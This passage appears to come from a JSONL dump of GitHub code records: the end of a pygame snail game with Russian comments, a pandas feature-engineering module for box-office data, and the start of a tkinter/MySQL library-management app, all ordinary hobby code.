base_color=\"BLACK\", hovering_color=\"Green\")\n PLAY_game.changeColor(PLAY_MOUSE_POS)\n PLAY_game.update(SCREEN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if PLAY_BACK.checkForInput(PLAY_MOUSE_POS):\n sound_menu.play()\n main_menu()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if PLAY_game.checkForInput(PLAY_MOUSE_POS):\n sound_usui.play()\n july_game(is_jump, jump_count)\n time_screen_update += 1 # Ввели переменную которая считает циклы, чтобы с гэпом показать второй скрин\n if time_screen_update == 40:\n SCREEN.blit(bg_first_two, (0, 0))\n\n pygame.display.update()\n\n\ndef play_two(time_screen_update=0):\n SCREEN.blit(bg_third_one, (0, 0))\n global game_score_two_level # Ввел глобальный переменную, чтобы при повторе уровня очки обнулялись\n game_score_two_level = 0\n while True:\n PLAY_MOUSE_POS = pygame.mouse.get_pos()\n # Кнопка назад\n PLAY_BACK = Button(image=None, pos=(W - 150, H - 100),\n text_input=\"MENU\", font=get_font(35), base_color=\"Black\", hovering_color=\"Green\")\n PLAY_BACK.changeColor(PLAY_MOUSE_POS)\n PLAY_BACK.update(SCREEN)\n # Кнопка игра\n PLAY_game = Button(image=None, pos=(W - 350, H - 100),\n text_input=\"GAME\", font=get_font(35), base_color=\"Black\", hovering_color=\"Green\")\n PLAY_game.changeColor(PLAY_MOUSE_POS)\n PLAY_game.update(SCREEN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if PLAY_BACK.checkForInput(PLAY_MOUSE_POS):\n sound_menu.play()\n main_menu()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if PLAY_game.checkForInput(PLAY_MOUSE_POS):\n sound_usui.play()\n game_level_two()\n time_screen_update += 1 # Ввели переменную которая считает циклы, чтобы с гэпом показать второй скрин\n if time_screen_update == 40:\n SCREEN.blit(bg_third_two, (0, 0))\n\n pygame.display.update()\n\n\ndef play_tree(time_screen_update=0):\n # global game_score_two_level\n # game_score_two_level = 1000 # костыль,т.к.игра продолжает играть и есть вероятность что опыт будет <0 и new def\n\n SCREEN.blit(bg_fourth, (0, 0))\n while True:\n PLAY_MOUSE_POS = pygame.mouse.get_pos()\n # Кнопка назад\n PLAY_BACK = Button(image=None, pos=(W - 350, H - 100),\n text_input=\"MENU\", font=get_font(35), base_color=\"Black\", hovering_color=\"Green\")\n PLAY_BACK.changeColor(PLAY_MOUSE_POS)\n PLAY_BACK.update(SCREEN)\n # Кнопка игра\n PLAY_about = Button(image=None, pos=(W - 600, H - 100),\n text_input=\"ABOUT\", font=get_font(35), base_color=\"Black\", hovering_color=\"Green\")\n PLAY_about.changeColor(PLAY_MOUSE_POS)\n PLAY_about.update(SCREEN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if PLAY_BACK.checkForInput(PLAY_MOUSE_POS):\n sound_menu.play()\n main_menu()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if PLAY_about.checkForInput(PLAY_MOUSE_POS):\n sound_usui.play()\n about()\n\n pygame.display.update()\n\n\ndef options():\n global game_score_max_level\n global multiplier_hard_easy\n global multiplier_speed\n while True:\n OPTIONS_MOUSE_POS = pygame.mouse.get_pos()\n\n SCREEN.fill(\"white\")\n\n # Заглавная надпись\n OPTIONS_TEXT = get_font(45).render(\"OPTIONS\", True, \"Black\")\n OPTIONS_RECT = OPTIONS_TEXT.get_rect(center=(W // 2, H // 5))\n SCREEN.blit(OPTIONS_TEXT, OPTIONS_RECT)\n\n # Кнопка назад в меню\n OPTIONS_BACK = Button(image=None, pos=(W // 2, H - 100),\n text_input=\"BACK\", font=get_font(45), base_color=\"Black\", hovering_color=\"Green\")\n\n OPTIONS_BACK.changeColor(OPTIONS_MOUSE_POS)\n OPTIONS_BACK.update(SCREEN)\n\n # Кнопка Первого уровня\n OPTIONS_july_game = Button(image=None, pos=(W // 2, H // 3),\n text_input=\"FIRST GAME\", font=get_font(30), base_color=\"Gray\",\n hovering_color=\"Green\")\n\n OPTIONS_july_game.changeColor(OPTIONS_MOUSE_POS)\n OPTIONS_july_game.update(SCREEN)\n\n # Кнопка Второго уровня\n OPTIONS_game_two = Button(image=None, pos=(W // 2, H // 3 + 50),\n text_input=\"SECOND GAME\", font=get_font(30), base_color=\"Gray\",\n hovering_color=\"Green\")\n\n OPTIONS_game_two.changeColor(OPTIONS_MOUSE_POS)\n OPTIONS_game_two.update(SCREEN)\n\n # Кнопка Отключить музыку\n OPTIONS_music_off = Button(image=None, pos=(W // 2, H // 3 + 100),\n text_input=\"MUSIC OFF\", font=get_font(30), base_color=\"Black\",\n hovering_color=\"Green\")\n\n OPTIONS_music_off.changeColor(OPTIONS_MOUSE_POS)\n OPTIONS_music_off.update(SCREEN)\n\n # Кнопка Уровень Изи\n OPTIONS_easy = Button(image=None, pos=(W // 2, H // 3 + 150),\n text_input=\"EASY KATKA\", font=get_font(30), base_color=\"Black\",\n hovering_color=\"Green\")\n OPTIONS_easy.changeColor(OPTIONS_MOUSE_POS)\n OPTIONS_easy.update(SCREEN)\n # Кнопка Уровень Изи\n OPTIONS_hard = Button(image=None, pos=(W // 2, H // 3 + 200),\n text_input=\"HARD KATKA\", font=get_font(30), base_color=\"Black\",\n hovering_color=\"Green\")\n\n OPTIONS_hard.changeColor(OPTIONS_MOUSE_POS)\n OPTIONS_hard.update(SCREEN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if OPTIONS_BACK.checkForInput(OPTIONS_MOUSE_POS):\n sound_menu.play()\n main_menu()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if OPTIONS_july_game.checkForInput(OPTIONS_MOUSE_POS):\n sound_usui.play()\n july_game(is_jump, jump_count)\n if event.type == pygame.MOUSEBUTTONDOWN:\n if OPTIONS_game_two.checkForInput(OPTIONS_MOUSE_POS):\n sound_usui.play()\n game_level_two()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if OPTIONS_music_off.checkForInput(OPTIONS_MOUSE_POS):\n sound_menu.play()\n pygame.mixer.music.pause()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if OPTIONS_easy.checkForInput(OPTIONS_MOUSE_POS):\n sound_menu.play()\n game_score_max_level = 1\n multiplier_hard_easy = 1\n multiplier_speed = 1\n main_menu()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if OPTIONS_hard.checkForInput(OPTIONS_MOUSE_POS):\n sound_menu.play()\n game_score_max_level = 2000\n multiplier_hard_easy = 10\n multiplier_speed = 2\n main_menu()\n\n pygame.display.update()\n\n\ndef about():\n while True:\n about_MOUSE_POS = pygame.mouse.get_pos()\n\n BG_about = pygame.image.load(\"images/background_about.jpg\").convert()\n SCREEN.blit(BG_about, (0, 0))\n\n about_BACK = Button(image=None, pos=(W // 2, H - 100),\n text_input=\"BACK\", font=get_font(35), base_color=\"Black\", hovering_color=\"Green\")\n\n about_BACK.changeColor(about_MOUSE_POS)\n about_BACK.update(SCREEN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if about_BACK.checkForInput(about_MOUSE_POS):\n sound_menu.play()\n main_menu()\n\n pygame.display.update()\n\n\ndef eam():\n while True:\n\n BG_about = pygame.image.load(\"images/background_eam.jpg\").convert()\n SCREEN.blit(BG_about, (0, 0))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n sound_menu.play()\n main_menu()\n\n pygame.display.update()\n\n\ndef game_over():\n while True:\n game_over_MOUSE_POS = pygame.mouse.get_pos()\n\n SCREEN.fill(\"white\")\n\n game_over_TEXT = get_font(45).render(\"GAME OVER\", True, \"Black\")\n game_over_RECT = game_over_TEXT.get_rect(centerx=W // 2, bottom=H // 4)\n SCREEN.blit(game_over_TEXT, game_over_RECT)\n\n game_over_TEXT = get_font(25).render(\"Please don't let the snail die!\", True, \"Black\")\n game_over_RECT = game_over_TEXT.get_rect(centerx=W // 2, bottom=H // 3)\n SCREEN.blit(game_over_TEXT, game_over_RECT)\n\n game_over_BACK = Button(image=None, pos=(W // 2, int(H // 1.3)),\n text_input=\"MENU\", font=get_font(75), base_color=\"Black\", hovering_color=\"Green\")\n\n game_over_BACK.changeColor(game_over_MOUSE_POS)\n game_over_BACK.update(SCREEN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if game_over_BACK.checkForInput(game_over_MOUSE_POS):\n sound_menu.play()\n main_menu()\n global game_score\n game_score = 0\n pygame.display.update()\n\n\ndef main_menu():\n while True:\n SCREEN.blit(BG_menu, (0, 0))\n\n MENU_MOUSE_POS = pygame.mouse.get_pos()\n\n MENU_TEXT = get_font(50).render(\"MAIN MENU\", True, \"#b68f40\")\n MENU_RECT = MENU_TEXT.get_rect(centerx=W // 2, bottom=H // 4)\n\n # Подгружаем рамки для текста\n image_play = pygame.image.load(\"assets/Play Rect.png\")\n image_options = pygame.image.load(\"assets/Options Rect.png\")\n image_quit = pygame.image.load(\"assets/Quit Rect.png\")\n\n # Масштабируем рамки\n image_play = pygame.transform.scale(image_play, (int(image_play.get_width() // 1.4),\n int(image_play.get_height() // 1.4)))\n image_options = pygame.transform.scale(image_options, (int(image_options.get_width() // 1.4),\n int(image_options.get_height() // 1.4)))\n image_quit = pygame.transform.scale(image_quit, (int(image_quit.get_width() // 1.4),\n int(image_quit.get_height() // 1.4)))\n image_about = image_quit\n\n # Настраиваем текст\n PLAY_BUTTON = Button(image=image_play, pos=(W // 2, 200), text_input=\"PLAY\",\n font=get_font(35), base_color=\"#d7fcd4\", hovering_color=\"White\")\n OPTIONS_BUTTON = Button(image=image_options, pos=(W // 2, 300), text_input=\"OPTIONS\",\n font=get_font(35), base_color=\"#d7fcd4\", hovering_color=\"White\")\n ABOUT_BUTTON = Button(image=image_about, pos=(W // 2, 400), text_input=\"ABOUT\",\n font=get_font(35), base_color=\"#d7fcd4\", hovering_color=\"White\")\n QUIT_BUTTON = Button(image=image_quit, pos=(W // 2, 500), text_input=\"QUIT\",\n font=get_font(35), base_color=\"#d7fcd4\", hovering_color=\"White\")\n VERSION_BUTTON = Button(image=None, pos=(W - 50, H - 10), text_input=f\"v_{VERSION_of_program}\",\n font=get_font(15), base_color=\"#d7fcd4\", hovering_color=\"White\")\n\n SCREEN.blit(MENU_TEXT, MENU_RECT)\n\n for button in [PLAY_BUTTON, OPTIONS_BUTTON, ABOUT_BUTTON, QUIT_BUTTON, VERSION_BUTTON]:\n button.changeColor(MENU_MOUSE_POS)\n button.update(SCREEN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n if PLAY_BUTTON.checkForInput(MENU_MOUSE_POS):\n sound_menu.play()\n play() # Сначала инициализируем разговорное окно, после функцию july_game()\n # july_game(is_jump, jump_count)\n if OPTIONS_BUTTON.checkForInput(MENU_MOUSE_POS):\n sound_menu.play()\n options()\n if ABOUT_BUTTON.checkForInput(MENU_MOUSE_POS):\n sound_menu.play()\n about()\n if QUIT_BUTTON.checkForInput(MENU_MOUSE_POS):\n pygame.quit()\n sys.exit()\n if VERSION_BUTTON.checkForInput(MENU_MOUSE_POS):\n sound_menu.play()\n eam()\n\n pygame.display.update()\n\n\n#########################################################\n# Первый уровень\n\nballs_data = ({'path': 'ball_snowduck.png', 'score': game_score_plus},\n {'path': 'ball_stick1.png', 'score': game_score_minus},\n {'path': 'ball_stick2.png', 'score': game_score_max_minus})\n# поочередно загружаем каждую иконку\nballs_surf = [pygame.image.load('images/' + data['path']).convert_alpha() for data in balls_data]\n\nballs = pygame.sprite.Group()\n\n\n\n\ndef createBall(group):\n a_randint = H * 0.6\n b_randint = H // 1.2\n indx = randint(0, len(balls_surf) - 1)\n y = randint(a_randint, b_randint)\n speed = randint(12, 14*multiplier_speed)\n\n return Ball(y, speed, balls_surf[indx], balls_data[indx]['score'], group)\n\n\ncreateBall(balls)\nspeed = 10\n\n\ndef collideBalls():\n global game_score\n for ball in balls:\n # при касании спрайт исчезает, добовляется очки\n if t_rect.collidepoint(ball.rect.midleft):\n sound_collideBalls.play() # звук столкновения\n game_score += ball.score*multiplier_hard_easy\n ball.kill()\n\n\n# Функция самой игры\ndef july_game(is_jump, jump_count):\n while True:\n keys = pygame.key.get_pressed()\n # Кнопка выхода\n game_july_MOUSE_POS = pygame.mouse.get_pos()\n game_july_BACK = Button(image=None, pos=(W - 100, H - 20),\n text_input=\"MENU\", font=get_font(35), base_color=\"Black\", hovering_color=\"Green\")\n game_july_BACK.changeColor(game_july_MOUSE_POS)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit()\n if game_score < 0:\n game_over()\n if game_score >= game_score_max_level:\n play_two()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if game_july_BACK.checkForInput(game_july_MOUSE_POS):\n main_menu()\n # Генерация спрайтов каждые 2 секунды, за счет таймера событий вначале\n elif event.type == pygame.USEREVENT:\n createBall(balls)\n\n # Если мы не в прыжке и нажимаем Пробел\n if not is_jump:\n if keys[pygame.K_SPACE]:\n is_jump = True\n else:\n if jump_count >= -10:\n # замедляем изменение координаты\n t_rect.y -= (jump_count * abs(jump_count)) * 0.5\n jump_count -= 0.5\n else:\n jump_count = 10\n is_jump = False\n\n # ФОН и СПРАЙТЫ\n SCREEN.blit(bg, (0, 0)) # Отрисовка фона\n balls.draw(SCREEN) # Отрисовка спрайтов\n # ОПЫТ\n SCREEN.blit(score, (5, 5)) # Отрисовка поля опыта с отступом от начала координат\n sc_text = f.render(str(game_score), 1, (94, 138, 14)) # Формирование текста опыта\n SCREEN.blit(sc_text, (25, 15)) # Отрисовка опыта\n # Герой\n SCREEN.blit(snail, t_rect)\n game_july_BACK.update(SCREEN) # Отрисовка кнопки\n pygame.display.update()\n\n clock.tick(FPS)\n\n collideBalls() # Столкновения\n balls.update(W)\n\n\n################################################################\n\nballs_v_data = ({'path': 'branch1.png', 'score': game_score_minus},\n {'path': 'branch2.png', 'score': game_score_minus-2},\n {'path': 'branch3.png', 'score': game_score_max_minus},\n {'path': 'blueberries.png', 'score': 8})\nballs_v_surf = [pygame.image.load('images/' + data['path']).convert_alpha() for data in balls_v_data]\n\n\ndef createBall_v(group):\n indx = randint(0, len(balls_v_surf) - 1)\n x = randint(20, W - 20)\n speed = randint(1, 4)\n\n return ball_v(x, speed, balls_v_surf[indx], balls_v_data[indx]['score'], group)\n\n\nballs_v = pygame.sprite.Group()\ncreateBall_v(balls_v)\nspeed = 10\n\n\ndef collideBalls_v():\n global game_score_two_level\n for ball in balls_v:\n # при касании спрайт исчезает, добовляется очки\n if t_rect.collidepoint(ball.rect.midleft) or t_rect.collidepoint(ball.rect.midright):\n sound_collideBalls.play() # звук столкновения\n game_score_two_level += ball.score\n ball.kill()\n\n\ngame_score_two_level = 0\n\n\ndef game_level_two():\n # global game_level_two_BACK\n speed = 20\n global snail\n while True:\n\n keys = pygame.key.get_pressed() # Нажатия клавиатуры\n game_level_two_MOUSE_POS = pygame.mouse.get_pos()\n # Движок\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if game_score_two_level < -1:\n play_two()\n if game_score_two_level >= game_score_max_level:\n play_tree()\n # Кнопка выхода\n if event.type == pygame.MOUSEBUTTONDOWN:\n if game_level_two_BACK.checkForInput(game_level_two_MOUSE_POS):\n main_menu()\n # Генерация спрайтов каждые 2 секунды, за счет таймера событий вначале\n elif event.type == pygame.USEREVENT:\n createBall_v(balls_v)\n\n # Движение улитки\n if keys[pygame.K_LEFT]:\n t_rect.x -= speed\n snail = snail_to_left\n if t_rect.x < 0:\n t_rect.x = 0\n elif keys[pygame.K_RIGHT]:\n t_rect.x += speed\n snail = snail_to_right\n if t_rect.x > W - t_rect.width:\n t_rect.x = W - t_rect.width\n\n # Фон спрайты\n BG_game_level_two = pygame.image.load(\"images/background_two.jpg\").convert()\n SCREEN.blit(BG_game_level_two, (0, 0))\n balls_v.draw(SCREEN) # Отрисовка спрайтов\n\n # Кнопка выхода\n game_level_two_BACK = Button(image=None, pos=(W - 100, H - 20),\n text_input=\"MENU\", font=get_font(35), base_color=\"Black\", hovering_color=\"Green\")\n game_level_two_BACK.changeColor(game_level_two_MOUSE_POS)\n game_level_two_BACK.update(SCREEN)\n\n # ОПЫТ\n SCREEN.blit(score, (5, 5)) # Отрисовка поля опыта с отступом от начала координат\n sc_text = f.render(str(game_score_two_level), 1, (94, 138, 14)) # Формирование текста опыта\n SCREEN.blit(sc_text, (25, 15)) # Отрисовка опыта\n\n # Герой-улитка\n SCREEN.blit(snail, t_rect)\n pygame.display.update()\n\n collideBalls_v() # Столкновения\n balls_v.update(H)\n\n clock.tick(FPS)\n pygame.display.update() # Обновление экрана\n\n\nmain_menu()\n\n","repo_name":"EAMstudio/game_snail_trip","sub_path":"main1.py","file_name":"main1.py","file_ext":"py","file_size_in_byte":25646,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"13468505325","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport ast # Interpret string as Python command\nfrom typing import Tuple\n\ndef extract_names(keyword_list):\n if pd.isna(keyword_list):\n return []\n else:\n return list(map(lambda x: x['name'].replace(' ', '_'), ast.literal_eval(keyword_list)))\n \n\ndef has_top_keyword(keyword_list, top_keywords):\n if not pd.isna(keyword_list):\n list_of_keywords = extract_names(keyword_list)\n for keyword in list_of_keywords:\n if keyword in top_keywords:\n return True\n return False\n\n\ndef extract_has_top_keyword(data: pd.DataFrame) -> Tuple[pd.DataFrame, list]:\n # Get pairs of keyword list + revenue for each movie\n df = data.copy()\n df['Keywords'] = df['Keywords'].map(extract_names, na_action=None)\n df = df[['Keywords', 'revenue']]\n\n keywords_df = (\n pd.DataFrame(df.Keywords.values.tolist())\n .stack()\n .reset_index(level=1, drop=True)\n .to_frame('Keywords')\n )\n df = keywords_df.join(df[['revenue']]).reset_index(drop=True)\n\n # Compute sum and mean revenue for each keyword + count occurences\n def f(x):\n d = {}\n d['revenue_sum'] = x['revenue'].sum()\n d['revenue_mean'] = x['revenue'].mean()\n d['keyword_count'] = len(x['revenue'])\n return pd.Series(d, index=['revenue_sum', 'revenue_mean', 'keyword_count'])\n\n df = (df\n .groupby('Keywords')\n .apply(f)\n .sort_values(['revenue_sum', 'revenue_mean'], ascending=False)\n .reset_index()\n )\n\n # Computing the top x most used percent of keywords without the above high_rev/low_count exotics\n df = df[df.keyword_count >= 5]\n perc_thresh = 70 # chosen so that dataset is balanced\n perc = np.percentile(df.revenue_mean, perc_thresh)\n\n # Generating new column\n top_keywords = list(df[df.revenue_mean >= perc].Keywords)\n\n result_df = data.copy()[['id', 'Keywords']]\n result_df['has_top_keyword'] = result_df[\"Keywords\"].apply(has_top_keyword, args=(top_keywords,))\n\n return result_df.drop(['Keywords'], axis=1), top_keywords\n\n\ndef getTimeFeatures(training_set):\n training_set = training_set.copy()\n releaseDate = pd.to_datetime(training_set['release_date']) \n training_set[\"day\"] = releaseDate.dt.dayofweek\n year = releaseDate.dt.year\n #some years are >2020 --> subtract 100\n year[year>2020] = year[year>2020]-100\n training_set[\"year\"] = year\n training_set[\"age\"] = year.max() - year\n return training_set[['id','day','year','age']]\n\ndef getNumericFeatures(training_set):\n training_set = training_set.copy()\n training_set[\"budgetLog\"] = np.log1p(training_set['budget'])\n training_set[\"PopLog\"] = np.log1p(training_set['popularity'])\n return training_set[['id','budgetLog','PopLog']]\n\ndef getBinaryFeatures(df):\n df = df.copy()\n df[\"hashomepage\"] = ~(df[\"homepage\"].isna())\n df[\"isinCollection\"] = ~(df[\"belongs_to_collection\"].isna())\n df[\"zeroBudget\"] = (df[\"budget\"]==0)\n return df[['id',\"hashomepage\",'isinCollection',\"zeroBudget\"]]\n\ndef getStarFeature(df):\n df = df.copy()\n df.loc[df.cast.isnull(), \"cast\"] = ''\n castList = df.cast.str.strip('[]')\n listOfallActors = pd.Series(pd.Series(list(\", \".join(castList.unique().tolist()).split('}, '))).str.split(\"'name': '\").str[1].str.split(\"'\").str[0].tolist())\n allActors = listOfallActors.value_counts()\n topActors = allActors[allActors>=10].index\n df['hasStar'] = df.cast.apply(lambda row: 1 if any(act in row for act in topActors) else 0)\n df['NumStar']= df.cast.apply(lambda row: sum(act in row for act in topActors))\n return df[['id',\"hasStar\",'NumStar']]\n\n#only works for genre at the moment, e.g., tranformListIntoBinaryFeatures(df, \"genre\", 100)\n#also works for spoken_language and production_countries now\n#also work for production_company\ndef tranformListIntoBinaryFeatures(df, feature, treshhold):\n df.list = df[feature].str.strip('[]')\n df.list[df.list.isnull()] = ''\n genres_list = pd.Series(list(set(\", \".join(df.list.unique().tolist()).split('}, ')))).str.split(\"'name': '\").str[1].str.split(\"'\").str[0].tolist()\n \n for x in range(genres_list.count(\"\")):\n genres_list.remove(\"\")\n genres_list=['missing' if x is np.nan else x for x in genres_list]\n \n genres_list_trimmed = genres_list.copy()\n for genre in genres_list:\n df[genre] = df[feature].str.contains(genre)\n df[genre] = df[genre].fillna(False)\n if df[genre].sum(axis = 0) < treshhold :\n genres_list_trimmed.remove(genre)\n #else:\n #print(df[genre].sum(axis = 0))\n #print(genre)\n print(genres_list_trimmed)\n df[\"numberCount\"] = df[genres_list].sum(axis = 1)\n return df[['id',\"numberCount\"]+genres_list_trimmed].copy()\n","repo_name":"Cruzzor/BoxOffice","sub_path":"common/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"18948293639","text":"from tkinter import *\r\nfrom random import choice\r\nfrom tkinter import Toplevel, ttk, messagebox , filedialog\r\nfrom tkinter.ttk import Treeview\r\nimport mysql.connector as mysql\r\nimport PIL\r\nfrom PIL import ImageTk, Image\r\nfrom pandas import *\r\n\r\n\r\ndef libraryDB():\r\n def connectDB():\r\n def connmysql():\r\n global mycursor\r\n global con\r\n host = hostvalue.get()\r\n user = uservalue.get()\r\n password = passvalue.get()\r\n try:\r\n con = mysql.connect(host=host, user=user, passwd=password)\r\n mycursor = con.cursor()\r\n\r\n except:\r\n messagebox.showerror('Error!', 'Please Try Again')\r\n return\r\n try:\r\n mycursor.execute('create database librarymanagement')\r\n mycursor.execute('use librarymanagement')\r\n mycursor.execute('create table library(student_id int(8) not null primary key,student_name varchar(30),book_name varchar(30),book_id varchar(10), author_name varchar(30),borrow_date varchar(20),return_date varchar(20))')\r\n messagebox.showinfo('Success!', 'Created and Connected to the Database Successfully!', parent=codb)\r\n except:\r\n mycursor.execute('use librarymanagement')\r\n messagebox.showinfo('Success!', 'Connected to the Database Successfully!', parent=codb)\r\n \r\n codb.destroy()\r\n\r\n \r\n codb = Toplevel(master=root)\r\n codb.title(\"Enter Credentials\")\r\n codb.grab_set()\r\n codb.resizable(False, False)\r\n codb.geometry(\"450x450+800+230\")\r\n codb.config(bg=\"black\")\r\n ####MYSQL HOST STUFFS####\r\n \r\n head = \"ZESCA\"\r\n headLabel = Label(codb, text=head, bg=\"#000000\", fg=\"#eec94c\", font=(\r\n 'Elianto', 40, ), )\r\n headLabel.place(x=26, y=20)\r\n \r\n hostvalue = StringVar()\r\n hostLabel = Label(codb, text=\"Enter Host: \", font=('Hero', 15 ),\r\n fg='#EEC94C',bg='#000000', relief=FLAT, width=15, anchor='n')\r\n hostLabel.place(x=10, y=130)\r\n hostEntry = Entry(codb, font=('Hero', 15), textvariable=hostvalue)\r\n hostEntry.place(x=200, y=130)\r\n\r\n ####MYSQL USER STUFFS##\r\n uservalue = StringVar()\r\n userLabel = Label(codb, text=\"Enter User: \", font=('Hero', 15),\r\n fg='#EEC94C',bg='#000000', relief=FLAT, width=15, anchor='n')\r\n userLabel.place(x=10, y=190)\r\n userEntry = Entry(codb, font=('Hero', 15), textvariable=uservalue)\r\n userEntry.place(x=200, y=190)\r\n\r\n ####MYSQL PASSWORD####\r\n passvalue = StringVar()\r\n passLabel = Label(codb, text=\"Enter Password: \", font=(\r\n 'Hero', 15), fg='#EEC94C',bg='#000000', relief=FLAT, width=15,anchor='n')\r\n passLabel.place(x=10, y=260)\r\n passEntry = Entry(codb, font=('Hero', 15),\r\n textvariable=passvalue,show = '*')\r\n passEntry.place(x=200, y=260)\r\n\r\n ####SUBMIT BUTTOM####\r\n submitButton = Button(codb, text=\"Connect\", font=('Hero', 15), bg='#EEC94C', relief=FLAT,\r\n width=8, activebackground='red', activeforeground='white', command=connmysql)\r\n submitButton.place(x=160, y=320)\r\n \r\n\r\n\r\n def addData():\r\n def addDB():\r\n studentid = idvalue.get()\r\n studentname = namevalue.get()\r\n bookname = bnvalue.get()\r\n bookid = bidvalue.get()\r\n authorname = authvalue.get()\r\n borrowdate = bdvalue.get()\r\n returndate = rdvalue.get()\r\n try:\r\n ss = 'insert into library values(%s,%s,%s,%s,%s,%s,%s)'\r\n mycursor.execute(ss, (studentid, studentname, bookname, bookid, authorname, borrowdate, returndate))\r\n con.commit()\r\n ans = messagebox.askyesnocancel('Success!', 'Data Added Successfully!! , Do you want to clear the form?', parent=adddb)\r\n if (ans == True):\r\n idvalue.set('')\r\n namevalue.set('')\r\n bnvalue.set('')\r\n bidvalue.set('')\r\n authvalue.set('')\r\n bdvalue.set('')\r\n rdvalue.set('')\r\n except:\r\n messagebox.showerror('Error!', 'Admn No already exists , Please try again', parent=adddb)\r\n mycursor.execute('select * from library')\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n\r\n adddb = Toplevel(master=dataEntryFrame)\r\n adddb.title(\"Add Student's Data\")\r\n adddb.config(bg='yellow')\r\n adddb.grab_set()\r\n adddb.resizable(False, False)\r\n adddb.geometry(\"470x470+220+200\")\r\n ####DATA STUFFS####\r\n\r\n ### Admn No DETAILS ###\r\n idvalue = StringVar()\r\n idLabel = Label(adddb, text=\"Enter Admn No: \", font=('Helvetica', 15, 'italic bold'),\r\n bg='dark violet', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n idLabel.place(x=10, y=10)\r\n idEntry = Entry(adddb, font=('Helvetica', 15, 'italic bold'),\r\n bd=5, textvariable=idvalue)\r\n idEntry.place(x=230, y=10)\r\n\r\n ### Name DETAILS ###\r\n namevalue = StringVar()\r\n nameLabel = Label(adddb, text=\"Enter Name: \", font=('Helvetica', 15, 'italic bold'),\r\n bg='dark violet', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n nameLabel.place(x=10, y=70)\r\n nameEntry = Entry(adddb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=namevalue)\r\n nameEntry.place(x=230, y=70)\r\n\r\n ### Book Name DETAILS ###\r\n bnvalue = StringVar()\r\n bnLabel = Label(adddb, text=\"Enter Book Name: \", font=('Helvetica', 15, 'italic bold'),\r\n bg='dark violet', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n bnLabel.place(x=10, y=130)\r\n bnEntry = Entry(adddb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=bnvalue)\r\n bnEntry.place(x=230, y=130)\r\n\r\n ### Book ID DETAILS ###\r\n bidvalue = StringVar()\r\n bidLabel = Label(adddb, text=\"Enter Book ID: \", font=('Helvetica', 15, 'italic bold'),\r\n bg='dark violet', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n bidLabel.place(x=10, y=190)\r\n bidEntry = Entry(adddb, font=('Helvetica', 15, 'italic bold'),\r\n bd=5, textvariable=bidvalue)\r\n bidEntry.place(x=230, y=190)\r\n\r\n ### Author Name DETAILS ###\r\n authvalue = StringVar()\r\n authLabel = Label(adddb, text=\"Enter Author Name: \", font=('Helvetica', 15, 'italic bold'),\r\n bg='dark violet', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n authLabel.place(x=10, y=250)\r\n authEntry = Entry(adddb, font=('Helvetica', 15, 'italic bold'),\r\n bd=5, textvariable=authvalue)\r\n authEntry.place(x=230, y=250)\r\n\r\n ### Borrow Date DETAILS ###\r\n bdvalue = StringVar()\r\n bdLabel = Label(adddb, text=\"Enter Borrow Date: \", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='dark violet', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n bdLabel.place(x=10, y=310)\r\n bdEntry = Entry(adddb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=bdvalue)\r\n bdEntry.place(x=230, y=310)\r\n\r\n ### Return Date DETIALS ###\r\n rdvalue = StringVar()\r\n rdLabel = Label(adddb, text=\"Enter Return Date: \", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='dark violet', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n rdLabel.place(x=10, y=370)\r\n rdEntry = Entry(adddb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=rdvalue)\r\n rdEntry.place(x=230, y=370)\r\n\r\n ### SUBMIT ###\r\n subButton = Button(adddb, text=\"Submit\", font=('Helvetica', 15, 'italic bold'), 